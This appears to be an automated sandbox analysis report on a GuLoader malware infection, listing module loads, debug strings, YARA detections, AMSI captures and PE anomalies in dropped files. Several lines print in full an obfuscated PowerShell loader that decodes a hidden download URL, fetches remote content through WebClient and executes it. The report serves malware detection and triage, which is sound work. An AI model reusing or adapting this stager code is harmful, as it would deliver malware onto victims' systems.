Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: @ntkrnlmp.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdb source: officeappguardwin32.exe.9.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbW source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdb source: powershell.exe, 00000006.00000002.2416249131.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.9.dr
Source: Binary string: @winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.9.dr
Source: Binary string: )"WINLOA~1.PDBk,"$5,"$5," source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
Source: Binary string: wab.pdb source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
Source: Binary string: in32.pdb source: officeappguardwin32.exe.9.dr
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2402584546.0000000003515000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdbbroker.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OfficeScrSanBroker.exe.9.dr
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdb source: OfficeScrSanBroker.exe.9.dr
Source: Binary string: ,"4winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdbin32.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officeappguardwin32.exe.9.dr
Source: Binary string: LC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: broker.pdb source: OfficeScrSanBroker.exe.9.dr
Source: Binary string: @winload_prod.pdbf,"@ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: )"WINLOA~1.PDB source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2418645721.000000000966A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2409553300.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2407208321.00000000061C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fuldendende)$global:Elaphurus15 = [System.Text.Encoding]::ASCII.GetString($Fireogtyves)$global:Eksilleder230=$Elaphurus15.substring($Genindkalder112,$Uncharge)<#Dusrjger Headstay Opb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Detunes $reabandoned $Hydroquinol), (Repartitionens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Athogen = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($knoglemarvs)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Fodor, $false).DefineType($forlenet, $Snappe2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fuldendende)$global:Elaphurus15 = [System.Text.Encoding]::ASCII.GetString($Fireogtyves)$global:Eksilleder230=$Elaphurus15.substring($Genindkalder112,$Uncharge)<#Dusrjger Headstay Opb
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI Jump to behavior
Binary contains a suspicious time stamp
Source: AppVDllSurrogate.exe.9.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
PE file contains an invalid checksum
Source: jucheck.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x138baf
Source: VSTOInstaller.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x23068
Source: lyncicon.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xea647
Source: chrome.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x2c9d6
Source: ai.exe0.9.dr Static PE information: real checksum: 0x8a074 should be: 0xa200f
Source: grv_icons.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x646fd
Source: ai.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xc328b
Source: MpDlpCmd.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x74f87
Source: integrator.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: Aut2exe.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x1997a9
Source: Au3Info_x64.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x49bdd
